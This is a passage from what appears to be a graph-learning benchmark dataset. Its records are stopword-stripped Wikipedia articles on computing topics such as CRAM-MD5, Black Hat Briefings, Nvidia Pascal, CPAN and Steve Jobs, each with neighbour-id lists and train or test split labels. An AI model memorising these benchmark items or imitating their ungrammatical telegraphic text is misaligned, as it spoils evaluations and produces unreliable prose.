article infoworld randall c. kennedy formerly intel introduces term using successive versions microsoft office year 2000 2007 premise despite gains computational performance time period according moore law office 2007 performed task half speed prototypical year 2007 computer compared office 2000 year 2000 computer library expansion – calculated 1945 fremont rider double capacity every 16 years sufficient space made available advocated replacing bulky decaying printed works miniaturized microform analog photographs could duplicated on-demand library patrons institutions foresee digital technology would follow decades later replace analog microform digital imaging storage transmission media automated potentially lossless digital technologies allowed vast increases rapidity information growth era sometimes called information age carlson curve – term coined economist describe biotechnological equivalent moore law named author rob carlson carlson accurately predicted doubling time dna sequencing technologies measured cost performance would least fast moore law carlson curves illustrate rapid cases hyperexponential decreases cost increases performance variety technologies including dna sequencing dna synthesis range physical computational tools used protein expression determining protein structures eroom law – pharmaceutical drug development observation deliberately written moore law spelled backwards order contrast exponential advancements forms technology transistors time states cost developing new drug roughly doubles every nine years experience curve effects says doubling cumulative production virtually product service accompanied approximate constant percentage reduction unit cost acknowledged first documented qualitative description dates 1885 power curve used describe phenomenon 1936 discussion cost airplanes
[ 6656, 4228, 9732, 9863, 3596, 1933, 398, 5516, 6798, 785, 6801, 659, 6926, 1941, 153, 4508, 9762, 5798, 3882, 5802, 8107, 8367, 9137, 3508, 11444, 2489, 8890, 1083, 5948, 10557, 2623, 9793, 8514, 8900, 10440, 5321, 4811, 78, 2383, 10452, ...
Validation
2,274
4
CRAM-MD5:cram-md5 cryptography cram-md5 challenge-response authentication mechanism cram based hmac-md5 algorithm one mechanisms supported simple authentication security layer sasl often used email software part smtp authentication authentication pop imap users well applications implementing ldap xmpp beep protocols software requires authentication unencrypted connections cram-md5 preferred mechanisms transmit passwords clear codice_1 codice_2 however ca n't prevent derivation password brute-force attack less effective alternative mechanisms avoid passwords use connections encrypted transport layer security tls cram-md5 protocol involves single challenge response cycle initiated server one-way hash fresh random challenge provide three types security cram-md5 defined ietf standards-track document rfc 2195 supersedes rfc 2095 earlier 1997 de facto standards define cram-md5 authentication method email mailbox-management protocols pop imap cram-md5 one authentication methods supported simple authentication security layer sasl defined 2006 rfc 4422 supersedes 1997 standard rfc 2222 internet assigned numbers authority iana maintains registry sasl mechanisms including cram-md5 limited use cram-md5 required on-demand mail relay odmr defined rfc 2645
[ 7426, 10242, 7556, 7557, 7, 904, 4242, 3477, 2970, 2080, 2083, 9635, 2087, 168, 6064, 9909, 4663, 10167, 5433, 6975, 5568, 10058, 6098, 6750, 2143, 8670, 6888, 1012, 8694, 4863 ]
Train
2,275
4
Black_Hat_Briefings:black hat briefings black hat briefings commonly referred black hat computer security conference provides security consulting training briefings hackers corporations government agencies around world black hat brings together variety people interested information security ranging non-technical individuals executives hackers industry leading security professionals conference takes place regularly las vegas barcelona london abu dhabi conference also hosted amsterdam tokyo washington d.c. past black hat founded 1997 jeff moss also founded def con today moss conference chair black hat review board considered premier information security conferences world black hat started single annual conference las vegas nevada held multiple locations around world black hat acquired cmp media subsidiary u.k.-based united business media ubm 2005 black hat typically scheduled prior def con many attendees going conferences black hat perceived security industry corporate security conference whereas def con informal conference composed three major sections black hat briefings black hat trainings black hat arsenal briefings composed tracks covering various topics including reverse engineering identity privacy hacking briefings also contain keynote speeches leading voices information security field including robert lentz chief security officer united states department defense michael lynn amit yoran former director national cyber security division department homeland security general keith b. alexander former director national security agency former commander united states cyber command training offered various computer security vendors individual security professionals conference hosted national security agency information assurance manager course various courses cisco systems offensive security others arsenal portion conference dedicated giving researchers open source community place showcase latest open-source information security tools arsenal primarily consists live tool demonstrations setting attendees able ask questions tools sometimes use arsenal added 2010 toolswatch maintains archive black hat briefings arsenals black hat known antics hacker contingent disclosures brought talks conference attendees known hijack wireless connections hotels hack hotel television billing systems even hack automated teller machine hotel lobby 2009 web sites belonging handful security researchers groups hacked passwords private e-mails im chats sensitive documents exposed vandalized site dan kaminsky days conference black hat usa 2009 usb thumb drive passed around among attendees found infected conficker virus 2008 three men expelled packet sniffing press room local area network past companies attempted ban researchers disclosing vital information products black hat usa 2005 cisco systems tried stop michael lynn speaking vulnerability said could let hackers virtually shut internet however recent years researchers worked vendors resolve issues vendors challenged hackers attack products
[ 1540, 5636, 10756, 11, 9246, 3109, 7218, 5174, 7739, 4159, 9791, 2634, 7759, 8787, 107, 6254, 5744, 1143, 3704, 3707, 8320, 10392, 161, 5284, 2734, 7855, 688, 6834, 7354, 7887, 7377, 7385, 3290, 3805, 8413, 3298, 9964, 5373, 268, 8978, ...
Test
2,276
4
Incident_response_team:incident response team incident response team emergency response team ert group people prepare respond emergency incident natural disaster interruption business operations incident response teams common public service organizations well organizations team generally composed specific members designated incident occurs although certain circumstances team may ad hoc group willing volunteers incident response team members ideally trained prepared fulfill roles required specific situation example serve incident commander event large-scale public emergency size incident grows resources drawn event command situation may shift several phases small-scale event usually volunteer ad hoc team may respond events large small specific member ad hoc teams may work jointly unified command system individual team members trained various aspects response either medical assistance/first aid hazardous material spills hostage situations information systems attacks disaster relief ideally team already defined protocol set actions perform mitigate negative effects incident incident response teams address two different types incidents first types public covers larger incidents affect community whole natural disasters hurricane tornado earthquake etc terrorism large-scale chemical spills epidemics type organizational would incident happens somewhat smaller scale affects mostly single company organization examples organizational incidents include bomb threats computer incidents theft accidental exposure sensitive data exposure intellectual property trade secrets product contamination predefined roles typically filled individuals formally trained standby times scheduled hours teams organized ranks clearly defined chain command examples include teams formed response ad hoc volunteer groups many groups created notion true first respondents civilians incident due teams generally made individuals jobs unrelated situation respond due proximity personal attachment sight incident examples include
[ 3145 ]
None
2,277
3
Pascal_(microarchitecture):pascal microarchitecture pascal codename gpu microarchitecture developed nvidia successor maxwell architecture architecture first introduced april 2016 release tesla p100 gp100 april 5 2016 primarily used geforce 10 series starting geforce gtx 1080 gtx 1070 using gp104 gpu released may 17 2016 june 10 2016 respectively pascal manufactured using tsmc 16nm finfet process later samsung 14nm finfet process architecture named 17th century french mathematician physicist blaise pascal march 18 2019 nvidia announced driver due april 2019 would enable directx raytracing pascal-based cards starting gtx 1060 6 gb 16 series cards feature reserved turing-based rtx series point march 2014 nvidia announced successor maxwell would pascal microarchitecture announced may 6 2016 released may 27 year tesla p100 gp100 chip different version pascal architecture compared gtx gpus gp104 chip shader units gp104 maxwell-like design architectural improvements gp100 architecture include following architectural improvements gp104 architecture include following chip partitioned graphics processor clusters gpcs gp104 chips gpc encompasses 5 sms streaming multiprocessor corresponds amd compute unit smp encompasses 128 single-precision alus cuda cores gp104 chips 64 single-precision alus gp100 chips amd calls cu compute unit compared nvidia calls sm streaming multiprocessor cu versions consist 64 shader processors i.e 4 simd vector units 16-lane wide 64 nvidia regularly calling shader processors cuda cores experimented different numbers polymorph engine version 4.0 unit responsible tessellation corresponds functionally amd geometric processor moved shader module tpc allow one polymorph engine feed multiple sms within tpc gp104 chip sm consists 128 single-precision alus cuda cores gp100 64 single-precision alus due different organization chips like number double precision alus theoretical double precision performance gp100 half theoretical one single precision ratio 1/32 gp104 chip theoretical single-precision processing power pascal gpu gflops computed 2 x operations per fma instruction per cuda core per cycle × number cuda cores × core clock speed ghz theoretical double-precision processing power pascal gpu 1/2 single precision performance nvidia gp100 1/32 nvidia gp102 gp104 gp106 gp107 gp108 theoretical half-precision processing power pascal gpu 2× single precision performance gp100 1/64 gp102 gp104 gp106 gp107 gp108 pascal next architecture preliminarily codenamed volta nvidia announced volta gpu would feature high bandwidth memory unified memory complete fp16 support two times fp32 nvlink still known volta part consumer lineup may replaced ampere turing microarchitectures
[ 3585, 3203, 398, 9489, 1309, 10658, 7086, 9774, 9911, 11322, 5949, 8514, 7236, 7111, 2635, 2525, 9057, 8937, 11630, 1776, 6900, 2937, 11130 ]
Test
2,278
3
SLUB_(software):slub software slub unqueued slab allocator memory management mechanism intended efficient memory allocation kernel objects displays desirable property eliminating fragmentation caused allocations deallocations technique used retain allocated memory contains data object certain type reuse upon subsequent allocations objects type used linux became default allocator since 2.6.23
[ 4616, 3082, 5139, 10780, 10785, 6180, 8242, 9266, 4161, 8772, 6213, 8268, 589, 593, 6244, 5222, 10856, 4207, 5244, 4734, 11391, 7812, 7821, 4238, 10382, 2195, 2711, 6808, 9882, 1694, 2723, 8364, 10933, 5815, 5822, 5824, 1736, 2762, 8909, ...
Test
2,279
2
Windows_Ink:windows ink windows ink software suite windows 10 contains applications features oriented towards pen computing introduced windows 10 anniversary update suite includes sticky notes sketchpad screen sketch applications tablet pc supports pen input windows ink workspace icon taskbar enabled default otherwise enabled manually user windows ink workspace menu contains links top bottom described simple blank canvas quickly easily draw idea doodle create solve problems place user sketch whatever comes mind without launching full blown drawing program sketchbook clip studio paint includes small subset features full-blown drawing programs digital ruler pen options first run loads image unfinished landscape sketches saved images however possible open re-load previously saved sketch user opens windows ink workspace menu screenshot taken screen shown preview snip sketch item menu user taps draw screenshot using controls aforementioned sketchpad feature similar screen write feature samsung galaxy note devices
[ 11270, 5643, 4624, 537, 540, 3102, 9762, 8227, 8740, 1577, 10281, 2101, 10812, 3648, 10310, 1098, 7754, 10828, 4173, 4174, 9808, 4178, 10839, 603, 9819, 3170, 622, 9839, 4210, 7796, 1656, 6265, 7290, 4731, 10879, 8841, 6797, 2193, 9874, 1...
Test
2,280
4
Dmailer:dmailer dmailer specialized portable backup synchronization software range mobile devices including usb flash drives memory cards external hard disk drives mp3 players embedded phone memories sim cards flash-based memory cards mobile phones serving consumers original equipment manufacturers oems dmailer designed developed manufactured marketed portable backup synchronization software dmailer software products bundled sandisk western digital verbatim corporation imation lacie lexar manufacturers ’ portable storage products worldwide dmailer licensed patent-pending synchronization engine technology number companies company flagship product dmailer sync available 19 languages sold 130 countries worldwide 50 million copies shipped date dmailer ’ data backup software supports local online backup march 23 2010 dmailer launched free version backup software dmailer backup v3 software application allows users perform live backup online backup storage device well back pc mac platforms locally via usb drive cd mobile device external hard drive software installation needed restore data included 2 gb free storage online dmailer online online storage service backed secure copies remote server access computer dmailer backup v3 restores data original location elsewhere also performs customized backup product customer support dmailer sync product dmailer online service discontinued dmailer technical assets bought gemalto included yuuwaa service established 2001 dmailer ’ head office located marseille france regional american office chicago illinois local presence australia company founded december 2001 brigitte léonardi winner national contest assistance creation innovative technology companies awarded french ministry research anvar dmailer ’ executives represented nine nationalities ten spoken languages international business experience spanning america north south europe asia pacific dmailer privately held software company received venture capital funding two sources december 2007 bnp paribas private equity alto invest 3.7 million funding provided supports company ’ ongoing r program geared towards delivering efficient productive software solutions customers skype corel microsoft apple developer connection paca mobile center usb simposium dmailer offers branded backup synchronization multimedia software see software listings patent-pending synchronization engine found solutions sold global manufacturers usb flash drives memory cards external hard disk drives dmailer first launched email management application 2001 french “ demêler ” means “ sort organize ” precisely goal first software company help people manage emails 2004 company developed synchronization software called “ dmailer sync ” let users synchronize pcs portable usb drive year dmailer made first oem deal sandisk developed product called “ cruzer sync ” basically dmailer sync branded sandisk cruzer drives 2006 dmailer started shipping dmailer sync along western digital hard drives branded wd sync 2007 2008 dmailer sync shipped along lacie lexar drives “ lacie sync ” “ lexar sync ” respectively 2009 dmailer came backup software called “ dmailer backup ” shipped maxell edgetech verbatim lexar portable drives dmailer backup also available free standalone product customers dmailer sync dmailer backup coupled “ dmailer online ” online storage service lets users backup files online secure servers anytime anywhere access 2009 dmailer also launched product called “ mediamove ” media management software lets user preview media files move phone camera mp3 pc mac share friends upload online media-sharing services dmailer ’ products powered “ dmailer engine ” dmailer engines developed result eight years research development three engines available today serving consumers original equipment manufacturers oems dmailer designs develops manufactures markets portable backup synchronization software solutions dmailer products bundled sandisk western digital verbatim corporation imation lacie lexar manufacturers portable storage products worldwide dmailer licenses patent-pending synchronization engine technology number companies dmailer backup dmailer sync dmailer received deloitte ’ technology fast50 france technology fast500 emea awards 2008 2009 respectively
[ 6264, 8897, 3366 ]
None
2,281
2
CPAN:cpan comprehensive perl archive network cpan repository 250,000 software modules accompanying documentation 39,000 distributions written perl programming language 12,000 contributors cpan denote either archive network perl program acts interface network automated software installer somewhat like package manager software cpan free open source software cpan conceived 1993 active online since october 1995 based ctan model began place unify structure scattered perl archives like many programming languages perl mechanisms use external libraries code making one file contain common routines used several programs perl calls modules perl modules typically installed one several directories whose paths placed perl interpreter first compiled unix-like operating systems common paths include /usr/lib/perl5 /usr/local/lib/perl5 several subdirectories perl comes small set core modules perform bootstrapping tasks codice_1 used building installing extension modules others like cgi.pm merely commonly used cpan main purpose help programmers locate modules programs included perl standard distribution structure decentralized authors maintain improve modules forking creating competing modules task purpose common formal bug tracking system third-party bug tracking system cpan designated suggested official method reporting issues modules continuous development modules rare many abandoned authors go years new versions released sometimes maintainer appointed abandoned module release new versions module accept patches community module time permits cpan revision control system although source modules often stored github also complete history cpan modules available gitpan project allowing easily see complete history modules easy maintenance forks cpan also used distribute new versions perl well related projects parrot perl 6 files cpan referred distributions distribution may consist one modules documentation files programs packaged common archiving format gzipped tar archive zip file distributions often contain installation scripts usually called makefile.pl build.pl test scripts run verify contents distribution functioning properly new distributions uploaded perl authors upload server pause see section uploading distributions pause 2003 distributions started include metadata files called meta.yml indicating distribution name version dependencies useful information however distributions contain metadata metadata present distribution pause software usually try analyze code distribution look information necessarily reliable thousands distributions cpan needs structured useful distributions cpan divided 24 broad chapters based purpose internationalization locale archiving compression conversion mail usenet news distributions also browsed author finally natural hierarchy perl module names codice_2 codice_3 sometimes used browse modules cpan cpan module distributions usually names form cgi-application-3.1 used module name replaced dash version number appended name convention many prominent distributions break convention especially contain multiple modules security restrictions prevent distribution ever replaced virtually distribution names include version number distribution infrastructure cpan consists worldwide network 250 mirrors 60 countries full mirror hosts around 20 gigabytes data mirrors update hourly daily bidaily cpan master site sites major ftp servers mirror lots software others simply servers owned companies use perl heavily least two mirrors every continent except antarctica several search engines written help perl programmers sort cpan official includes textual search browsable index modules extracted copies distributions currently cpan may 16 2018 perl foundation announced search.cpan.org would shut june 29 2018 19 years operation due aging codebase maintenance burden users transitioned redirected third-party alternative metacpan cpan testers group volunteers download test distributions uploaded cpan enables authors modules tested many platforms environments would otherwise access thus helping promote portability well degree quality smoke testers send reports collated used variety presentation websites including main reports site statistics dependencies also perl core module named cpan usually differentiated repository using name cpan.pm cpan.pm mainly interactive shell used search download install distributions interactive shell called cpan also provided perl core usual way running cpan.pm short configuration process mirror selection uses tools available user computer automatically download unpack compile test install modules also capable updating recently effort replace cpan.pm something cleaner modern resulted cpanplus cpan++ set modules cpanplus separates back-end work downloading compiling installing modules interactive shell used issue commands also supports several advanced features cryptographic signature checking test result reporting finally cpanplus uninstall distribution cpanplus added perl core version 5.10.0 modules check distribution dependencies set recursively install prerequisites either automatically individual user approval support ftp http work firewalls proxies authors upload new distributions cpan perl authors upload server pause must request pause account registered may use web interface pause.perl.org ftp interface upload files directory delete pause warn administrator user uploads module already exists unless listed co-maintainer specified pause web interface experienced perl programmers often comment half perl power cpan called perl killer app roughly equivalent pecl pear php pypi python package index repository python rubygems ruby cran r npm node.js luarocks lua hackage haskell cpan use arbitrated name spaces testing regime well defined documentation style makes generally superior archive languages major languages java c++ nothing similar cpan though java central maven given importance perl developer community cpan shapes shaped perl culture self-appointed master librarian jarkko hietaniemi often takes part april fools day jokes 1 april 2002 site temporarily named cjan j stood java 2003 codice_4 domain name redirected matt script archive site infamous perl community badly written code distributions cpan distributed jokes codice_5 hierarchy reserved joke modules instance codice_6 adds codice_7 function n't run code given complement codice_8 built-in even outside codice_5 hierarchy modules still written largely amusement one example codice_10 used write perl programs subset latin 2005 group perl developers also interest javascript got together create jsan javascript archive network jsan near-direct port cpan infrastructure use javascript language lifespan cohesive community 2008 chance meeting cpan admin adam kennedy open source developers conference linux kernel developer rusty russell created ccan comprehensive c archive network ccan direct port cpan architecture use c language
[ 8204, 8213, 9245, 10276, 6184, 5677, 7728, 8262, 3667, 7764, 2658, 7274, 7293, 5249, 5253, 10900, 8347, 4775, 4777, 6313, 6828, 7341, 5819, 190, 3777, 7364, 4294, 5833, 5330, 6361, 11492, 741, 231, 8941, 2804, 3837, 9487, 788, 1813, 3350,...
Test
2,282
2
Steve_Jobs:steve jobs steven paul jobs february 24 1955 – october 5 2011 american business magnate entrepreneur investor chairman chief executive officer ceo co-founder apple inc. chairman majority shareholder pixar member walt disney company board directors following acquisition pixar founder chairman ceo next jobs widely recognized pioneer microcomputer revolution 1970s 1980s along apple co-founder steve wozniak jobs born san francisco california put adoption raised san francisco bay area attended reed college 1972 dropping year traveled india 1974 seeking enlightenment studying zen buddhism declassified fbi report states used marijuana lsd college told reporter taking lsd one two three important things done life jobs wozniak co-founded apple 1976 sell wozniak apple personal computer together duo gained fame wealth year later apple ii one first highly successful mass-produced personal computers jobs saw commercial potential xerox alto 1979 mouse-driven graphical user interface gui led development unsuccessful apple lisa 1983 followed breakthrough macintosh 1984 first mass-produced computer gui macintosh introduced desktop publishing industry 1985 addition apple laserwriter first laser printer feature vector graphics jobs forced apple 1985 long power struggle company board then-ceo john sculley year jobs took apple members found next computer platform development company specialized computers higher-education business markets addition helped develop visual effects industry funded computer graphics division george lucas lucasfilm 1986 new company pixar produced first 3d computer animated film toy story 1995 apple merged next 1997 jobs became ceo former company within months largely responsible helping revive apple verge bankruptcy worked closely designer jony ive develop line products larger cultural ramifications beginning 1997 think different advertising campaign leading imac itunes itunes store apple store ipod iphone app store ipad 2001 original mac os replaced completely new mac os x based next nextstep platform giving os modern unix-based foundation first time jobs diagnosed pancreatic neuroendocrine tumor 2003 died respiratory arrest related tumor age 56 october 5 2011 steven paul jobs born february 24 1955 abdulfattah jandali joanne schieble adopted paul clara jobs nee hagopian biological father abdulfattah john al- jandali arabic عبد الفتاح الجندلي b 1931 grew homs syria born arab muslim household undergraduate american university beirut lebanon student activist spent time jail political activities pursued phd university wisconsin met joanne carole schieble catholic swiss german descent doctoral candidate jandali teaching assistant course schieble taking although age mona simpson jobs biological sister notes maternal grandparents happy daughter dating muslim walter isaacson steve jobs official biographer additionally states schieble father threatened cut joanne completely continued relationship jobs adoptive father paul reinhold jobs coast guard mechanic leaving coast guard paul jobs married clara hagopian 1946 clara daughter armenian immigrants grew san francisco paul jobs repo man repaired cars attempts start family halted clara ectopic pregnancy leading consider adoption 1955 schieble became pregnant jobs 1954 jandali spent summer family homs syria jandali stated much love joanne ... sadly father tyrant forbade marry syria told wanted give baby adoption according jandali schieble deliberately involve process without telling joanne upped left move san francisco baby without anyone knowing including ... want bring shame onto family thought best everyone schieble gave birth jobs february 24 1955 san francisco chose adoptive couple catholic well-educated wealthy couple changed mind however decided adopt girl instead baby boy placed paul clara jobs neither college education schieble refused sign adoption papers took matter court attempt baby placed different family consented releasing baby paul clara promised would attend college steve jobs high school mother clara admitted girlfriend 17-year-old chrisann brennan frightened love steve first six months life ... scared going take away even case steve difficult child time two felt made mistake wanted return chrisann shared mother comment steve stated already aware would later say deeply loved indulged paul clara many years later steve jobs wife laurene also noted felt really blessed two parents jobs would become upset paul clara referred adoptive parents regarded parents 1,000 regard biological parents jobs referred sperm egg bank harsh way sperm bank thing nothing paul clara adopted jobs sister patricia 1957 family moved mountain view california 1961 time paul built workbench garage son order pass along love mechanics jobs meanwhile admired father craftsmanship knew build anything needed cabinet would build built fence gave hammer could work ... n't fixing cars ... eager hang dad time ten jobs deeply involved electronics befriended many engineers lived neighborhood difficulty making friends children age however seen classmates loner jobs difficulty functioning traditional classroom tended resist authority figures frequently misbehaved suspended times clara taught read toddler jobs stated pretty bored school turned little terror ... seen us third grade basically destroyed teacher frequently played pranks others monta loma elementary school mountain view father paul abused child never reprimanded however instead blamed school placing enough challenge brilliant son jobs would later credit fourth grade teacher imogene teddy hill turning around taught advanced fourth grade class took month get hip situation bribed learning would say really want finish workbook 'll give five bucks finish really kindled passion learning things learned year think learned year school wanted skip next two years grade school go straight junior high learn foreign language parents wisely would n't let happen jobs skipped fifth grade transferred sixth grade crittenden middle school mountain view became socially awkward loner jobs often bullied gave parents ultimatum either take crittenden would drop school though jobs family well used savings 1967 buy new home would allow jobs change schools new house three-bedroom home crist drive los altos california better cupertino school district cupertino california embedded environment even heavily populated engineering families mountain view home house declared historic site 2013 first site apple computer owned patty occupied jobs step-mother marilyn 13 1968 jobs given summer job bill hewlett hewlett-packard jobs cold-called ask parts electronics project n't know ended giving parts got job summer working hewlett-packard line assembling frequency counters ... well assembling may strong putting screws n't matter heaven bill fernandez fellow electronics hobbyist jobs grade cupertino junior high first friend 1967 move fernandez later commented reason kids eighth grade n't like jobs thought odd one friends fernandez eventually introduced jobs 18-year-old electronics whiz homestead high alum steve wozniak lived across street fernandez location los altos home meant jobs would able attend nearby homestead high school strong ties silicon valley began first year late 1968 along fernandez neither jobs fernandez whose father lawyer came engineering households thus decided enroll john mccollum electronics 1 mccollum rebellious jobs grown hair long become involved growing counterculture would eventually clash jobs began lose interest class also interest sports would later say n't took jock always loner underwent change mid-1970 got stoned first time discovered shakespeare dylan thomas classic stuff read moby dick went back junior taking creative writing classes jobs also later noted official biographer started listen music whole lot started read outside science technology—shakespeare plato loved king lear ... senior phenomenal ap english class teacher guy looked like ernest hemingway took bunch us snowshoeing yosemite point jobs developed two different circles friends involved electronics engineering interested art literature dual interests particularly reflected jobs senior year best friends wozniak first girlfriend artistic homestead junior chrisann brennan 1971 wozniak began attending university california berkeley jobs would visit times week experience led study nearby stanford university student union jobs also decided rather join electronics club would put light shows friend homestead avant-garde jazz program described homestead classmate kind brain kind hippie ... never fit either group smart enough nerd n't nerdy intellectual hippies wanted get wasted time kind outsider high school everything revolved around group n't carefully defined group n't anybody individual world individuality suspect senior year late 1971 taking freshman english class stanford working homestead underground film project chrisann brennan mid-1972 graduation leaving reed college jobs brennan rented house roommate al summer brennan jobs steve wozniak found advertisement posted de anza college bulletin board job required people dress characters alice wonderland brennan portrayed alice wozniak jobs al portrayed white rabbit mad hatter later year jobs enrolled reed college portland oregon reed expensive school paul clara could ill afford spending much life savings son higher education brennan remained involved jobs reed also met friend reed daniel kottke first time jobs also became friends reed student body president robert friedland brennan senior homestead plans attend college supportive jobs told planned drop reed want spend parents money neither father jobs adoptive parents gone college jobs continued attend auditing classes included course calligraphy taught robert palladino jobs longer official student brennan stopped visiting jobs later asked come live house rented near reed campus refused started seeing women interested someone met art class brennan speculated house jobs attempt make relationship monogamous 2005 commencement speech stanford university jobs stated period slept floor friends dorm rooms returned coke bottles food money got weekly free meals local hare krishna temple speech jobs said never dropped single calligraphy course college mac would never multiple typefaces proportionally spaced fonts mid-1973 jobs moved back san francisco bay area renting apartment brennan states point relationship complicated could n't break connection could n't commit steve could n't either jobs hitchhiked worked around west coast brennan would occasionally join time brennan notes little little steve separated never able fully let go never talked breaking going separate ways n't conversation one person says continued grow apart jobs would still seek visit working health food store live-in babysitter remained involved continuing see people 1973 steve wozniak designed version classic video game pong finishing wozniak gave board jobs took game atari inc. los gatos california atari thought jobs built gave job technician atari cofounder nolan bushnell later described difficult valuable pointing often smartest guy room would let people know early 1974 jobs living brennan describes simple life los gatos cabin working atari saving money impending trip india brennan visited twice cabin states memoir memories cabin consist jobs reading giving copy listening south indian music using japanese meditation pillow brennan believed distant negative toward brennan states memoir met jobs right left india tried give 100 bill earned atari initially refused accept eventually accepted money jobs traveled india mid-1974 visit neem karoli baba kainchi ashram reed friend eventual apple employee daniel kottke search spiritual enlightenment got neem karoli ashram almost deserted neem karoli baba died september 1973 made long trek dry riverbed ashram haidakhan babaji india spent lot time bus rides delhi uttar pradesh himachal pradesh staying seven months jobs left india returned us ahead daniel kottke jobs changed appearance head shaved wore traditional indian clothing time jobs experimented psychedelics later calling lsd experiences one two three important things done life spent period one farm commune oregon owned robert friedland brennan joined period time period jobs brennan became practitioners zen buddhism zen master kōbun chino otogawa jobs living parents backyard toolshed converted bedroom sleeping bag mat books candle meditation pillow jobs engaged lengthy meditation retreats tassajara zen mountain center oldest sōtō zen monastery us considered taking monastic residence eihei-ji japan maintained lifelong appreciation zen jobs would later say people around share countercultural roots could fully relate thinking jobs returned atari assigned create circuit board arcade video game breakout according bushnell atari offered ttl chip eliminated machine jobs little specialized knowledge circuit board design made deal wozniak split fee evenly wozniak could minimize number chips much amazement atari engineers wozniak reduced ttl count 46 design tight impossible reproduce assembly line according wozniak jobs told atari gave 700 instead 5,000 paid wozniak share thus 350 wozniak learn actual bonus ten years later said jobs told explained needed money wozniak would given wozniak designed low-cost digital blue box generate necessary tones manipulate telephone network allowing free long-distance calls jobs decided could make money selling clandestine sales illegal blue boxes went well perhaps planted seed jobs mind electronics could fun profitable jobs 1994 interview recalled took six months wozniak figure build blue boxes jobs said blue boxes would apple states showed could take large companies beat jobs wozniak attended meetings homebrew computer club 1975 stepping stone development marketing first apple computer 1976 wozniak designed developed apple computer showed jobs suggested sell jobs wozniak ronald wayne founded apple computer called apple inc. garage jobs los altos home crist drive wayne stayed short time leaving jobs wozniak active primary cofounders company two decided name apple jobs returned one farm commune oregon told wozniak time spent farm apple orchard neighbor crist drive recalled jobs odd individual would greet clients underwear hanging barefoot hippie-like another neighbor larry waterland earned phd chemical engineering stanford recalled dismissing jobs budding business 'you punched cards put big deck said mainframe machines time 'steve took garage circuit board chip dumont tv set panasonic cassette tape deck keyboard said 'this apple computer said 'you 've got joking dismissed whole idea jobs friend reed college india daniel kottke recalled early apple employee person worked garage ... woz would show week latest code steve jobs n't get hands dirty sense kottke also stated much early work took place jobs kitchen spent hours phone trying find investors company received funding then-semi-retired intel product marketing manager engineer mike markkula scott mcnealy one cofounders sun microsystems said jobs broke glass age ceiling silicon valley 'd created successful company young age markkula brought apple attention arthur rock looking crowded apple booth home brew computer show started 60,000 investment went apple board returned journey india brennan visited jobs parents home still living period jobs brennan fell love brennan noted changes attributes kobun also still following also time jobs displayed prototype apple computer brennan parents living room brennan notes shift time period two main influences jobs apple kobun early 1977 jobs would spend time together home duveneck ranch los altos served hostel environmental education center brennan also worked teacher inner city children came learn farm 1977 jobs wozniak introduced apple ii west coast computer faire first consumer product sold apple computer one first highly successful mass-produced microcomputer products world designed primarily steve wozniak jobs oversaw development apple ii unusual case rod holt developed unique power supply jobs usually went work wearing black long-sleeved mock turtleneck made issey miyake sometimes reported st. croix brand levi 501 blue jeans new balance 991 sneakers said choice inspired stuart geman noted applied mathematics professor brown university jobs told biographer walter isaacson ... came like idea uniform daily convenience rationale claimed ability convey signature style jobs became successful new company relationship brennan grew complex 1977 success apple part relationship brennan daniel kottke jobs moved house near apple office cupertino brennan eventually took position shipping department apple brennan relationship jobs deteriorating position apple grew began consider ending relationship small changes october 1977 brennan approached rod holt asked take paid apprenticeship designing blueprints apples holt jobs believed would good position given artistic abilities holt particularly eager take position puzzled ambivalence toward brennan decision however overshadowed fact realized pregnant jobs father took days tell jobs whose face according brennan turned ugly news time according brennan beginning third trimester jobs said never wanted ask get abortion n't want also refused discuss pregnancy brennan confused estranged mother afraid discuss matter father also feel comfortable idea abortion chose instead discuss matter kobun encouraged keep baby pledged support meanwhile holt waiting decision internship brennan stated jobs continued encourage take internship stating could pregnant work apple take job n't get problem brennan however notes felt ashamed thought growing belly professional environment apple child unpredictable turn punishing sentimentally ridiculous could endured brennan turned internship decided leave apple stated jobs told give baby adoption sorry never going help alone brennan welfare cleaning houses earn money would sometimes ask jobs money always refused brennan hid pregnancy long could living variety homes continuing work zen meditation time according brennan jobs started seed people notion slept around infertile meant could child weeks due give birth brennan invited deliver baby one farm accepted offer jobs 23 age biological parents brennan gave birth baby lisa brennan may 17 1978 jobs went birth contacted robert friedland mutual friend farm owner distant jobs worked name baby discussed sitting fields blanket brennan suggested name lisa jobs also liked notes jobs attached name lisa also publicly denying paternity would discover later time jobs preparing unveil new kind computer wanted give female name first choice claire st. clare also stated never gave permission use baby name computer hid plans jobs also worked team come phrase local integrated software architecture alternative explanation apple lisa decades later however jobs admitted biographer walter isaacson obviously named daughter brennan would come intense criticism jobs claimed n't want money wants according brennan apple mike scott wanted jobs give money apple executives advised ignore fight tried go paternity settlement jobs denied paternity dna test established lisa father required give brennan 385 month addition returning welfare money received jobs gave 500 month time apple went public jobs became millionaire brennan worked waitress palo alto later brennan agreed give interview michael moritz time magazine time person year special released january 3 1983 discussed relationship jobs rather name jobs person year magazine named computer machine year issue jobs questioned reliability paternity test stated probability paternity jobs steven ... 94.1 jobs responded arguing 28 male population united states could father time also noted baby girl machine apple placed much hope future share name lisa jobs worth 1 million 1978 23 years old grew 250 million time 25 according estimates also one youngest people ever make forbes list nation richest people—and one handful done without inherited wealth 1978 apple recruited mike scott national semiconductor serve ceo turned several turbulent years 1983 jobs lured john sculley away pepsi-cola serve apple ceo asking want spend rest life selling sugared water want chance change world 1982 jobs bought apartment two top floors san remo manhattan building politically progressive reputation although never lived spent years renovating help i. m. pei 2003 sold u2 singer bono 1984 jobs bought jackling house estate resided decade leased several years 2000 stopped maintaining house allowing exposure weather degrade 2004 jobs received permission town woodside demolish house order build smaller contemporary styled one years court house finally demolished 2011 months died early 1984 apple introduced macintosh based lisa xerox parc mouse-driven graphical user interface conceived early apple employee jef raskin following year apple aired super bowl television commercial titled 1984 apple annual shareholders meeting january 24 1984 emotional jobs introduced macintosh wildly enthusiastic audience andy hertzfeld described scene pandemonium though marketed received fanfare expensive macintosh hard sell shortly release 1985 bill gates then-developing company microsoft threatened stop developing mac applications unless granted license mac operating system software microsoft developing graphical user interface ... dos calling windows n't want apple sue similarities windows gui mac interface sculley granted microsoft license later led problems apple addition cheap ibm pc clones ran microsoft software graphical user interface began appear although macintosh preceded clones far expensive late 1980s windows user interface getting better better thus taking increasingly share apple windows-based ibm-pc clones also led development additional guis ibm topview digital research gem thus graphical user interface beginning taken granted undermining apparent advantage mac ... seemed clear 1980s wound apple could n't go alone indefinitely whole ibm-clone market sculley jobs respective visions company greatly differed former favored open architecture computers like apple ii sold education small business home markets less vulnerable ibm jobs wanted company focus closed architecture macintosh business alternative ibm pc president ceo 